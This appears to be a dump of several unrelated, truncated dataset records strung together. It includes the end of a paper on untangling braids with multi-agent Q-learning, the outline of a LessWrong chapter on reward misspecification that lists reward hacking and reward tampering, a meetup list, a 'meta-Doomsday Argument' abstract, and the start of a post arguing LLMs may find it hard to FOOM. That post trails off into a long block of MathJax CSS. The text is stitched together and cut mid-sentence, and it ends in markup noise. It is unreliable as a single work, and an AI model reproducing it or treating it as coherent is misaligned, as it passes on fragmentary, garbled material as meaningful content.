Untangling of braids requires the implementation of Q-learning algorithm discussed in Section 2. To measure the performance of Q-learning model, we utilize the metrics provided by OpenAI Gym interface, namely rewards over episodes of a particular environment. Separate experiments were performed for different environments. The choice of hyper-parameters selection was looked from some of the work in the literature [[6](#bib.bib6)]. In the environment where we consider braids with 2222 strands, we have a single agent which performs series of actions during training to untangle the braid. We observe during the training process inside each episode an agent starts with random actions to untangle the braids, and finally over the period of time learns the right actions to reach the target output. It can be observed looking at figures [5](#S4.F5 "Figure 5 ‣ IV Experiments ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [6](#S4.F6 "Figure 6 ‣ IV Experiments ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") of different lengths of the input that negative rewards are quite prominent, if we train the model for lesser number of episodes, and agent hardly learns, whereas the episodes rewards progressively increase over time and ultimately levels out at a high reward per episode value from episode 4000, which indicates that the agent learns to maximize its total reward earned over the period of time.
In the multi-agent scenario, where we consider braids with 3 strands, in each episode the first agent for the given length of the input tries to tangle the braid during the fixed number of defined steps applying the transformations discussed in Section 1, that tangled state is the input for the second agent which again applies the same transformations to un-tangle the braid. As we approach the problem as a competitive game between two players (player1 = tangling player, player2= un-tangling). It is observed from Table [II](#S4.T2 "TABLE II ‣ IV Experiments ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), for lesser number of training episodes and larger length of the input the probability of the tangling player to win the game is more, whereas when we train the system for higher number of episodes the probability of the un-tangling player to win the game is more times at the end of training. Figures [1](#S1.F1 "Figure 1 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [2](#S1.F2 "Figure 2 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") shows the examples hard tangled braids produced by player1 after 150 episodes.
| | |
| --- | --- |
| Refer to caption | Refer to caption |
| Ep vs Rw @1000 episodes | Ep vs Rw @1000 episodes |
Figure 5: Plots for Rewards during training over episodes for n=7 and n=8
| | |
| --- | --- |
| Refer to caption | Refer to caption |
| Ep vs Rw @1000 episodes | Ep vs Rw @10000 episodes |
Figure 6: Plots for Rewards during training over episodes for n=7 and n=8, Ep=Episodes, Rw=Rewards
| Input length |
| |
| --- |
| ep=1000 |
| steps=20 |
|
| |
| --- |
| ep=10000 |
| steps=20 |
|
| |
| --- |
| ep=1000 |
| steps=100 |
|
| |
| --- |
| ep=10000 |
| steps=100 |
|
| 7 | 40% | 81.7% | 46.2% | 66.6% |
| 8 | 30.7% | 85% | 48.6% | 85% |
| 9 | 29.4% | 87.2% | 42.7% | 75.8% |
| 10 | 24.9% | 72.9% | 36.3% | 84.9% |
| 11 | 24.8% | 72.3% | 32.7% | 60.9% |
TABLE II: probability of player2 of winning the game, ep=episodes
V Conclusion
-------------
In this pilot study we successfully conducted several experiments using Q-learning algorithm to untangle the braids with 2 and 3 strands. The problem of untangling of braids with 2 strands was simply approached as rule-based approach, where the agent learns over the time right rules to untangle the braid. Whereas, the problem to untangle the braids with 3 strands was approached as a competitive game between two players, where the first agent starts with a fixed length of input and applies the rules to tangle the braid, that tangled braid is the input for the second agent which again applies the rules to untangle the braid, ultimately if second agent successfully untangles the braid it wins the round. We observe the more we train the model, the more is the probability of the second agent to win the game. In the future we intend to approach the similar problem using DQN(Deep Q-leaning Network) to compare the result with Q-learning approach. |
d141544c-1864-4e81-a42b-45f84af2e81f | trentmkelly/LessWrong-43k | LessWrong | AI Safety 101 : Reward Misspecification
Overview
1. Reinforcement Learning: The chapter starts with a reminder of some reinforcement learning concepts. This includes a quick dive into the concept of rewards and reward functions. This section lays the groundwork for explaining why reward design is extremely important.
2. Optimization: This section briefly introduces the concept of Goodhart's Law. It provides some motivation behind understanding why rewards are difficult to specify in a way such that they do not collapse in the face of immense optimization pressure.
3. Reward misspecification: With a solid grasp of the notion of rewards and optimization the readers are introduced to one of the core challenges of alignment - reward misspecification. This is also known as the Outer Alignment problem. The section begins by discussing the necessity of good reward design in addition to algorithm design. This is followed by concrete examples of reward specification failures such as reward hacking and reward tampering.
4. Learning by Imitation: This section focuses on some proposed solutions to reward misspecification that rely on learning reward functions through imitating human behavior. It examines proposals such as imitation learning (IL), behavioral cloning (BC), and inverse reinforcement learning (IRL). Each section also contains an examination of possible issues and limitations of these approaches as they pertain to resolving reward hacking.
5. Learning by Feedback: The final section investigates proposals aiming to rectify reward misspecification by providing feedback to the machine learning models. The section also provides a comprehensive insight into how current large language models (LLMs) are trained. The discussion covers reward modeling, reinforcement learning from human feedback (RLHF), reinforcement learning from artificial intelligence feedback (RLAIF), and the limitations of these approaches.
1.0: Reinforcement Learning
The section provides a succinct reminder of several concepts in reinf |
3b09e1eb-fee7-4e65-a074-e6d931b79081 | trentmkelly/LessWrong-43k | LessWrong | Weekly LW Meetups
This summary was posted to LW Main on August 26th. The following week's summary is here.
Irregularly scheduled Less Wrong meetups are taking place in:
* Baltimore Area Weekly Meetup: 28 August 2016 08:00PM
* European Community Weekend: 02 September 2016 03:35PM
The remaining meetups take place in cities with regular scheduling, but involve a change in time or location, special meeting content, or simply a helpful reminder about the meetup:
* Moscow: rationalist culture, applied consequentialism, Stanovich: 28 August 2016 02:00PM
* Moscow LW meetup in "Nauchka" library: 09 September 2016 07:50PM
* Sydney Rationality Dojo - September 2016: 04 September 2016 04:00PM
* Sydney Rationality Dojo - October 2016: 02 October 2016 04:00PM
* Washington, D.C.: Legos: 28 August 2016 03:30PM
Locations with regularly scheduled meetups: Austin, Berlin, Boston, Brussels, Buffalo, Canberra, Columbus, Denver, Kraków, London, Madison WI, Melbourne, Moscow, New Hampshire, New York, Philadelphia, Research Triangle NC, San Francisco Bay Area, Seattle, Sydney, Tel Aviv, Toronto, Vienna, Washington DC, and West Los Angeles. There's also a 24/7 online study hall for coworking LWers and a Slack channel for daily discussion and online meetups on Sunday night US time.
If you'd like to talk with other LW-ers face to face, and there is no meetup in your area, consider starting your own meetup; it's easy (more resources here). Check one out, stretch your rationality skills, build community, and have fun!
In addition to the handy sidebar of upcoming meetups, a meetup overview is posted on the front page every Friday. These are an attempt to collect information on all the meetups happening in upcoming weeks. The best way to get your meetup featured is still to use the Add New Meetup feature, but you'll also have the benefit of having your meetup mentioned in a weekly overview. These overview posts are moved to the discussion section when the new post goes up.
Please note that for yo |
9c7e2b71-45b4-4ada-a068-11f94ae45f6c | trentmkelly/LessWrong-43k | LessWrong | Meta-Doomsday Argument: Uncertainty About the Validity of the Probabilistic Prediction of the End of the World
Abstract: Four main forms of Doomsday Argument (DA) exist—Gott’s DA, Carter’s DA, Grace’s DA and Universal DA. All four forms use different probabilistic logic to predict that the end of the human civilization will happen unexpectedly soon based on our early location in human history. There are hundreds of publications about the validity of the Doomsday argument. Most of the attempts to disprove the Doomsday Argument have some weak points. As a result, we are uncertain about the validity of DA proofs and rebuttals. In this article, a meta-DA is introduced, which uses the idea of logical uncertainty over the DA’s validity estimated based on a virtual prediction market of the opinions of different scientists. The result is around 0.4 for the validity of some form of DA, and even smaller for “Strong DA”, which predicts the end of the world in the near term. We discuss many examples of the validity of the DA in real life as an instrument to prove it “experimentally”. We also show that DA becomes strongest if it is based on the idea of the “natural reference class” of observers, that is, the observers who know about the DA (i.e. a Self-Referenced DA). Such a DA predicts that there is a high probability of a global catastrophe with human extinction in the 21st century, which aligns with what we already know based on analysis of different technological risks.
Highlights:
· There are four main types of DA: future population prediction (Gott’s DA), Bayesian update of risks (Carter’s DA), the more probable Late Filter (Grace’s DA) and the Universal DA.
· Meta-DA treats logical uncertainty about the predictive power of the DA as a probability that DA will work.
· We used a virtual prediction market of scientists to assess the logical uncertainty of the DA, which produced estimation of around 0.4 of its validity.
· The strongest, and thus most important form of DA is the Self-Referenced DA, and for this class “the end” may be as early as middle of the 21th century, though |
6bcaa2b6-e112-48a5-9df5-65f301aafd32 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | LLMs May Find It Hard to FOOM
*Epistemic status: some of the technological progress parts of this I've been thinking about for many years, other more LLM-specific parts I have been thinking about for months or days.*
LLM are trained as [simulators](https://www.lesswrong.com/posts/vJFdjigzmcXMhNTsx/simulators) for token-generating processes, which (in any training set derived from the Internet) are generally human-like or human-derived agents. The computational capacity of these simulated agents is bounded above by the forward-pass computational capacity of the LLM, but is not bounded below. An extremely large LLM could, and frequently will, produce an exquisitely accurate portrayal of a very average human: a sufficiently powerful LLM may be very superhuman at the task of simulating average humans with an IQ of around 100, far better at it than any human writer or improv actor — but whatever average human it simulates won't be superhuman, and that capability is not [FOOM](https://old-wiki.lesswrong.com/w/index.php?title=AI_takeoff&_ga=2.195370917.803104956.1699518808-685953086.1699518806#Hard_takeoff)-making material.
Suppose we had an LLM whose architecture and size was computationally capable in a single forward pass of doing a decent simulation of a human with an IQ of, let's say, O(1000).mjx-chtml {display: inline-block; line-height: 0; text-indent: 0; text-align: left; text-transform: none; font-style: normal; font-weight: normal; font-size: 100%; font-size-adjust: none; letter-spacing: normal; word-wrap: normal; word-spacing: normal; white-space: nowrap; float: none; direction: ltr; max-width: none; max-height: none; min-width: 0; min-height: 0; border: 0; margin: 0; padding: 1px 0}
.MJXc-display {display: block; text-align: center; margin: 1em 0; padding: 0}
.mjx-chtml[tabindex]:focus, body :focus .mjx-chtml[tabindex] {display: inline-table}
.mjx-full-width {text-align: center; display: table-cell!important; width: 10000em}
.mjx-math {display: inline-block; border-collapse: separate; border-spacing: 0}
.mjx-math \* {display: inline-block; -webkit-box-sizing: content-box!important; -moz-box-sizing: content-box!important; box-sizing: content-box!important; text-align: left}
.mjx-numerator {display: block; text-align: center}
.mjx-denominator {display: block; text-align: center}
.MJXc-stacked {height: 0; position: relative}
.MJXc-stacked > \* {position: absolute}
.MJXc-bevelled > \* {display: inline-block}
.mjx-stack {display: inline-block}
.mjx-op {display: block}
.mjx-under {display: table-cell}
.mjx-over {display: block}
.mjx-over > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-under > \* {padding-left: 0px!important; padding-right: 0px!important}
.mjx-stack > .mjx-sup {display: block}
.mjx-stack > .mjx-sub {display: block}
.mjx-prestack > .mjx-presup {display: block}
.mjx-prestack > .mjx-presub {display: block}
.mjx-delim-h > .mjx-char {display: inline-block}
.mjx-surd {vertical-align: top}
.mjx-surd + .mjx-box {display: inline-flex}
.mjx-mphantom \* {visibility: hidden}
.mjx-merror {background-color: #FFFF88; color: #CC0000; border: 1px solid #CC0000; padding: 2px 3px; font-style: normal; font-size: 90%}
.mjx-annotation-xml {line-height: normal}
.mjx-menclose > svg {fill: none; stroke: currentColor; overflow: visible}
.mjx-mtr {display: table-row}
.mjx-mlabeledtr {display: table-row}
.mjx-mtd {display: table-cell; text-align: center}
.mjx-label {display: table-row}
.mjx-box {display: inline-block}
.mjx-block {display: block}
.mjx-span {display: inline}
.mjx-char {display: block; white-space: pre}
.mjx-itable {display: inline-table; width: auto}
.mjx-row {display: table-row}
.mjx-cell {display: table-cell}
.mjx-table {display: table; width: 100%}
.mjx-line {display: block; height: 0}
.mjx-strut {width: 0; padding-top: 1em}
.mjx-vsize {width: 0}
.MJXc-space1 {margin-left: .167em}
.MJXc-space2 {margin-left: .222em}
.MJXc-space3 {margin-left: .278em}
.mjx-test.mjx-test-display {display: table!important}
.mjx-test.mjx-test-inline {display: inline!important; margin-right: -1px}
.mjx-test.mjx-test-default {display: block!important; clear: both}
.mjx-ex-box {display: inline-block!important; position: absolute; overflow: hidden; min-height: 0; max-height: none; padding: 0; border: 0; margin: 0; width: 1px; height: 60ex}
.mjx-test-inline .mjx-left-box {display: inline-block; width: 0; float: left}
.mjx-test-inline .mjx-right-box {display: inline-block; width: 0; float: right}
.mjx-test-display .mjx-right-box {display: table-cell!important; width: 10000em!important; min-width: 0; max-width: none; padding: 0; border: 0; margin: 0}
.MJXc-TeX-unknown-R {font-family: monospace; font-style: normal; font-weight: normal}
.MJXc-TeX-unknown-I {font-family: monospace; font-style: italic; font-weight: normal}
.MJXc-TeX-unknown-B {font-family: monospace; font-style: normal; font-weight: bold}
.MJXc-TeX-unknown-BI {font-family: monospace; font-style: italic; font-weight: bold}
.MJXc-TeX-ams-R {font-family: MJXc-TeX-ams-R,MJXc-TeX-ams-Rw}
.MJXc-TeX-cal-B {font-family: MJXc-TeX-cal-B,MJXc-TeX-cal-Bx,MJXc-TeX-cal-Bw}
.MJXc-TeX-frak-R {font-family: MJXc-TeX-frak-R,MJXc-TeX-frak-Rw}
.MJXc-TeX-frak-B {font-family: MJXc-TeX-frak-B,MJXc-TeX-frak-Bx,MJXc-TeX-frak-Bw}
.MJXc-TeX-math-BI {font-family: MJXc-TeX-math-BI,MJXc-TeX-math-BIx,MJXc-TeX-math-BIw}
.MJXc-TeX-sans-R {font-family: MJXc-TeX-sans-R,MJXc-TeX-sans-Rw}
.MJXc-TeX-sans-B {font-family: MJXc-TeX-sans-B,MJXc-TeX-sans-Bx,MJXc-TeX-sans-Bw}
.MJXc-TeX-sans-I {font-family: MJXc-TeX-sans-I,MJXc-TeX-sans-Ix,MJXc-TeX-sans-Iw}
.MJXc-TeX-script-R {font-family: MJXc-TeX-script-R,MJXc-TeX-script-Rw}
.MJXc-TeX-type-R {font-family: MJXc-TeX-type-R,MJXc-TeX-type-Rw}
.MJXc-TeX-cal-R {font-family: MJXc-TeX-cal-R,MJXc-TeX-cal-Rw}
.MJXc-TeX-main-B {font-family: MJXc-TeX-main-B,MJXc-TeX-main-Bx,MJXc-TeX-main-Bw}
.MJXc-TeX-main-I {font-family: MJXc-TeX-main-I,MJXc-TeX-main-Ix,MJXc-TeX-main-Iw}
.MJXc-TeX-main-R {font-family: MJXc-TeX-main-R,MJXc-TeX-main-Rw}
.MJXc-TeX-math-I {font-family: MJXc-TeX-math-I,MJXc-TeX-math-Ix,MJXc-TeX-math-Iw}
.MJXc-TeX-size1-R {font-family: MJXc-TeX-size1-R,MJXc-TeX-size1-Rw}
.MJXc-TeX-size2-R {font-family: MJXc-TeX-size2-R,MJXc-TeX-size2-Rw}
.MJXc-TeX-size3-R {font-family: MJXc-TeX-size3-R,MJXc-TeX-size3-Rw}
.MJXc-TeX-size4-R {font-family: MJXc-TeX-size4-R,MJXc-TeX-size4-Rw}
.MJXc-TeX-vec-R {font-family: MJXc-TeX-vec-R,MJXc-TeX-vec-Rw}
.MJXc-TeX-vec-B {font-family: MJXc-TeX-vec-B,MJXc-TeX-vec-Bx,MJXc-TeX-vec-Bw}
@font-face {font-family: MJXc-TeX-ams-R; src: local('MathJax\_AMS'), local('MathJax\_AMS-Regular')}
@font-face {font-family: MJXc-TeX-ams-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_AMS-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_AMS-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_AMS-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-B; src: local('MathJax\_Caligraphic Bold'), local('MathJax\_Caligraphic-Bold')}
@font-face {font-family: MJXc-TeX-cal-Bx; src: local('MathJax\_Caligraphic'); font-weight: bold}
@font-face {font-family: MJXc-TeX-cal-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-R; src: local('MathJax\_Fraktur'), local('MathJax\_Fraktur-Regular')}
@font-face {font-family: MJXc-TeX-frak-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-B; src: local('MathJax\_Fraktur Bold'), local('MathJax\_Fraktur-Bold')}
@font-face {font-family: MJXc-TeX-frak-Bx; src: local('MathJax\_Fraktur'); font-weight: bold}
@font-face {font-family: MJXc-TeX-frak-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-BI; src: local('MathJax\_Math BoldItalic'), local('MathJax\_Math-BoldItalic')}
@font-face {font-family: MJXc-TeX-math-BIx; src: local('MathJax\_Math'); font-weight: bold; font-style: italic}
@font-face {font-family: MJXc-TeX-math-BIw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-BoldItalic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-BoldItalic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-BoldItalic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-R; src: local('MathJax\_SansSerif'), local('MathJax\_SansSerif-Regular')}
@font-face {font-family: MJXc-TeX-sans-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-B; src: local('MathJax\_SansSerif Bold'), local('MathJax\_SansSerif-Bold')}
@font-face {font-family: MJXc-TeX-sans-Bx; src: local('MathJax\_SansSerif'); font-weight: bold}
@font-face {font-family: MJXc-TeX-sans-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-I; src: local('MathJax\_SansSerif Italic'), local('MathJax\_SansSerif-Italic')}
@font-face {font-family: MJXc-TeX-sans-Ix; src: local('MathJax\_SansSerif'); font-style: italic}
@font-face {font-family: MJXc-TeX-sans-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-script-R; src: local('MathJax\_Script'), local('MathJax\_Script-Regular')}
@font-face {font-family: MJXc-TeX-script-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Script-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Script-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Script-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-type-R; src: local('MathJax\_Typewriter'), local('MathJax\_Typewriter-Regular')}
@font-face {font-family: MJXc-TeX-type-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Typewriter-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Typewriter-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Typewriter-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-R; src: local('MathJax\_Caligraphic'), local('MathJax\_Caligraphic-Regular')}
@font-face {font-family: MJXc-TeX-cal-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-B; src: local('MathJax\_Main Bold'), local('MathJax\_Main-Bold')}
@font-face {font-family: MJXc-TeX-main-Bx; src: local('MathJax\_Main'); font-weight: bold}
@font-face {font-family: MJXc-TeX-main-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-I; src: local('MathJax\_Main Italic'), local('MathJax\_Main-Italic')}
@font-face {font-family: MJXc-TeX-main-Ix; src: local('MathJax\_Main'); font-style: italic}
@font-face {font-family: MJXc-TeX-main-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-R; src: local('MathJax\_Main'), local('MathJax\_Main-Regular')}
@font-face {font-family: MJXc-TeX-main-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-I; src: local('MathJax\_Math Italic'), local('MathJax\_Math-Italic')}
@font-face {font-family: MJXc-TeX-math-Ix; src: local('MathJax\_Math'); font-style: italic}
@font-face {font-family: MJXc-TeX-math-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size1-R; src: local('MathJax\_Size1'), local('MathJax\_Size1-Regular')}
@font-face {font-family: MJXc-TeX-size1-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size1-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size1-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size1-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size2-R; src: local('MathJax\_Size2'), local('MathJax\_Size2-Regular')}
@font-face {font-family: MJXc-TeX-size2-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size2-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size2-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size2-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size3-R; src: local('MathJax\_Size3'), local('MathJax\_Size3-Regular')}
@font-face {font-family: MJXc-TeX-size3-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size3-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size3-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size3-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size4-R; src: local('MathJax\_Size4'), local('MathJax\_Size4-Regular')}
@font-face {font-family: MJXc-TeX-size4-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size4-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size4-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size4-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-R; src: local('MathJax\_Vector'), local('MathJax\_Vector-Regular')}
@font-face {font-family: MJXc-TeX-vec-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-B; src: local('MathJax\_Vector Bold'), local('MathJax\_Vector-Bold')}
@font-face {font-family: MJXc-TeX-vec-Bx; src: local('MathJax\_Vector'); font-weight: bold}
@font-face {font-family: MJXc-TeX-vec-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Bold.otf') format('opentype')}
